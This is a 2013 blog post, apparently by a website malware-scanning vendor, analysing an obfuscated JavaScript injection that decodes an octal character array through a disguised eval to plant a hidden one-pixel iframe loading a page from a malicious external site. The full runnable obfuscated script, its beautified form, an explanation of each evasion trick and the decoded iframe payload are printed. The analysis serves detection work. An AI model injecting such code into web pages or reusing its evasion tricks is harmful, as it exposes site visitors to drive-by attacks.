Monday, March 25, 2013

Obfuscated JavaScript to load hidden iframe with malicious redirection

Obfuscated JavaScript used to load hidden iframe with malicious link

This sort of malicious re-directions using obfuscated execution of eval have been detected by Website walware scanner. In this case the script contained lots of redundant "IF" statements to by-pass the detection mechanisms. The invocation of eval is passed through several variables to mask it from malware detection engines.

Full website malware scan report: http://goo.gl/JhYp5
Submission date: Sun Mar 24 16:27:53 2013
Threat dump:
[[                                                                                                                                                                                                                                                          ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body%26=5151}catch(gdsgd){v="eval";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{}catch(q){asd=1;}if(!asd){w={a:window}.a;vv=v;}}e=w[vv];if(1){f=new Array(050,0146,0165,0156,0143,0164,0151,0157,0156,040,050,051,040,0173,015,012,040,040,040,040,0166,0141,0162,040,0157,0165,040,075,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0143,0162,0145,0141,0164,0145,0105,0154,0145,0155,0145,0156,0164,050,047,0151,0146,0162,0141,0155,0145,047,051,073,015,012,015,012,040,040,040,040,0157,0165,056,0163,0162,0143,040,075,040,047,0150,0164,0164,0160,072,057,057,0167,0167,0167,056,0163,0165,0172,0165,0153,0151,0147,0163,0162,066,060,060,056,0156,0145,0164,0141,0165,056,0156,0145,0164,057,0143,0157,0165,0156,0164,0145,0162,056,0160,0150,0160,047,073,015,012,040,040,040,040,0157,0165,056,0163,0164,0171,0154,0145,056,0160,0157,0163,0151,0164,0151,0157,0156,040,075,040,047,0141,0142,0163,0157,0154,0165,0164,0145,047,073,015,012,040,040,040,040,0157,0165,056,0163,0164,0171,0154,0145,056,0142,0157,0162,0144,0145,0162,040,075,040,047,060,047,073,015,012,040,040,040,040,0157,0165,056,0163,0164,0171,0154,0145,056,0150,0145,0151,0147,0150,0164,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0157,0165,056,0163,0164,0171,0154,0145,056,0167,0151,0144,0164,0150,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0157,0165,056,0163,0164,0171,0154,0145,056,0154,0145,0146,0164,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0157,0165,056,0163,0164,0171,0154,0145,056,0164,0157,0160,040,075,040,047,061,0160,0170,047,073,015,012,015,012,040,040,040,040,0151,0146,040,050,041,0144,0157,0143,0165,0155,0145,0156,0164,056,0147,0145,0164,0105,0154,0145,0155,0145,0156,0164,0102,0171,0111,0144,050,047,0157,0165,047,051,051,040,0173,015,012,040,040,040,040,040,040,040,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0167,0162,0151,0164,0145,050,047,074,0144,0151,0166,040,0151,0144,075,0134,047,0157,0165,0134,047,076,074,057,0144,0151,0166,076,047,051,073,015,012,040,040,040,040,040,040,040,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0147,0145,0164,0105,0154,0145,0155,0145,0156,0164,0102,0171,0111,0144,050,047,0157,0165,047,051,056,0141,0160,0160,0145,0156,0144,0103,0150,0151,0154,0144,050,0157,0165,051,073,015,012,040,040,040,040,0175,015,012,0175,051,050,051,073);}w=f;s=[];if(window.document)for(i=2-2;-i+471!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]);}xz=e;if(v)xz(s)}]]

Snapshot from Quttera's Online Malware Scanner:






















The beautified script 

ff = String;
fff = "fromCharCode";
ff = ff[fff];
 zz = 3;
 try {
     document.body % 26 = 5151
 } catch (gdsgd) {
     v = "eval";
     if (document) try {
             document.body = 12;
     } catch (gdsgsdg) {
         asd = 0;
         try {} catch (q) {
             asd = 1;
         }
         if (!asd) {
             w = {
                 a: window
             }.a;
             vv = v;
         }
     }
     e = w[vv];
     if (1) {
         f = new Array(050, 0146, 0165, 0156, 0143, 0164, 0151, 0157, 0156, 040, 050, 051, 040, 0173, 015, 012, 040, 040, 040, 040, 0166, 0141, 0162, 040, 0157, 0165, 040, 075, 040, 0144, 0157, 0143, 0165, 0155, 0145, 0156, 0164, 056, 0143, 0162, 0145, 0141, 0164, 0145, 0105, 0154, 0145, 0155, 0145, 0156, 0164, 050, 047, 0151, 0146, 0162, 0141, 0155, 0145, 047, 051, 073, 015, 012, 015, 012, 040, 040, 040, 040, 0157, 0165, 056, 0163, 0162, 0143, 040, 075, 040, 047, 0150, 0164, 0164, 0160, 072, 057, 057, 0167, 0167, 0167, 056, 0163, 0165, 0172, 0165, 0153, 0151, 0147, 0163, 0162, 066, 060, 060, 056, 0156, 0145, 0164, 0141, 0165, 056, 0156, 0145, 0164, 057, 0143, 0157, 0165, 0156, 0164, 0145, 0162, 056, 0160, 0150, 0160, 047, 073, 015, 012, 040, 040, 040, 040, 0157, 0165, 056, 0163, 0164, 0171, 0154, 0145, 056, 0160, 0157, 0163, 0151, 0164, 0151, 0157, 0156, 040, 075, 040, 047, 0141, 0142, 0163, 0157, 0154, 0165, 0164, 0145, 047, 073, 015, 012, 040, 040, 040, 040, 0157, 0165, 056, 0163, 0164, 0171, 0154, 0145, 056, 0142, 0157, 0162, 0144, 0145, 0162, 040, 075, 040, 047, 060, 047, 073, 015, 012, 040, 040, 040, 040, 0157, 0165, 056, 0163, 0164, 0171, 0154, 0145, 056, 0150, 0145, 0151, 0147, 0150, 0164, 040, 075, 040, 047, 061, 0160, 0170, 047, 073, 015, 012, 040, 040, 040, 040, 0157, 0165, 056, 0163, 0164, 0171, 0154, 0145, 056, 0167, 0151, 0144, 0164, 0150, 040, 075, 040, 047, 061, 0160, 0170, 047, 073, 015, 012, 040, 040, 040, 040, 0157, 0165, 056, 0163, 0164, 0171, 0154, 0145, 056, 0154, 0145, 0146, 0164, 040, 075, 040, 047, 061, 0160, 0170, 047, 073, 015, 012, 040, 040, 040, 040, 0157, 0165, 056, 0163, 0164, 0171, 0154, 0145, 056, 0164, 0157, 0160, 040, 075, 040, 047, 061, 0160, 0170, 047, 073, 015, 012, 015, 012, 040, 040, 040, 040, 0151, 0146, 040, 050, 041, 0144, 0157, 0143, 0165, 0155, 0145, 0156, 0164, 056, 0147, 0145, 0164, 0105, 0154, 0145, 0155, 0145, 0156, 0164, 0102, 0171, 0111, 0144, 050, 047, 0157, 0165, 047, 051, 051, 040, 0173, 015, 012, 040, 040, 040, 040, 040, 040, 040, 040, 0144, 0157, 0143, 0165, 0155, 0145, 0156, 0164, 056, 0167, 0162, 0151, 0164, 0145, 050, 047, 074, 0144, 0151, 0166, 040, 0151, 0144, 075, 0134, 047, 0157, 0165, 0134, 047, 076, 074, 057, 0144, 0151, 0166, 076, 047, 051, 073, 015, 012, 040, 040, 040, 040, 040, 040, 040, 040, 0144, 0157, 0143, 0165, 0155, 0145, 0156, 0164, 056, 0147, 0145, 0164, 0105, 0154, 0145, 0155, 0145, 0156, 0164, 0102, 0171, 0111, 0144, 050, 047, 0157, 0165, 047, 051, 056, 0141, 0160, 0160, 0145, 0156, 0144, 0103, 0150, 0151, 0154, 0144, 050, 0157, 0165, 051, 073, 015, 012, 040, 040, 040, 040, 0175, 015, 012, 0175, 051, 050, 051, 073);
     }
     w = f;
     s = [];
     if (window.document) for (i = 2 - 2; - i + 471 != 0; i += 1) {
             j = i;
             if ((031 == 0x19)) if (e) s = s + ff(w[j]);
     }
     xz = e;
     if (v) xz(s)
 }

The obfuscation flow

  1. ff = String;
    fff = "fromCharCode";
    ff = ff[fff];
    /* ff is pointer to String's method fromCharCode hence getting String.fromCharCode */
  2. try { document.body % 26 = 5151
    /* since body is object or string, numeric operation will raise exception and following "catch" block will be executed */
    } catch (gdsgd) { v = "eval";
    /* v = eval which is identical to eval("javascript code") */
  3. if (document) try {
    document.body = 12;
    /* the same as before, the following instruction will raise exception */ } catch (gdsgsdg) {
    asd = 0;
    try {} catch (q) {
    /* try block is empty, catch block is skipped and asd will remain zero */
    asd = 1;
    }
  4. if (!asd) {
    /* since asd is zero this if condition will be executed the following trik is identical to "w = window" w = { a: window }.a; vv = v; vv = "eval" */
    }
    /* w equals to window and vv equals to eval thus this instruction is identical to e = window["eval"] */
    e = w[vv];
    if (1) {
    /* 1 is true so execution flow enters this if block */
  5. if (window.document){
    /* window.document is object so it is always true and execution flow enters this block */
    for (i = 2 - 2; - i + 471 != 0; i += 1) {
    j = i;
    if ((031 == 0x19)){
    /* this is comparison of the same value represented in hexanumeric and octal formats */
    if (e){
    /* e points to function eval so it is true and execution block will enter here */
    s = s + ff(w[j]);
    /* this equals to s = s + String.fromCharCode(w[j]) */
    } } } }
  6. xz = e;
    /* xz now points to eval method */
    if (v){
    /* v points to eval so it is "true" and thus eval(s) will be executed */
    xz(s)

The malicious injection

By the time this post was created the site was already down.
The simplified version of the threat is:

(function () { var ou = document.createElement('iframe'); ou.src = 'http://www.suzukigsr600[.]netau[.]net/counter.php'; ou.style.position = 'absolute'; ou.style.border = '0'; ou.style.height = '1px'; ou.style.width = '1px'; ou.style.left = '1px'; ou.style.top = '1px'; if (!document.getElementById('ou')) { document.write('
'); document.getElementById('ou').appendChild(ou); } })();


The iframe loaded the file from external malicious resource. Such threats are trickier for detection and remediation. These and other javascript obfuscation techniques detection is "built-in" Website Anti-malware Monitoring and user is notified instantly once it is identified.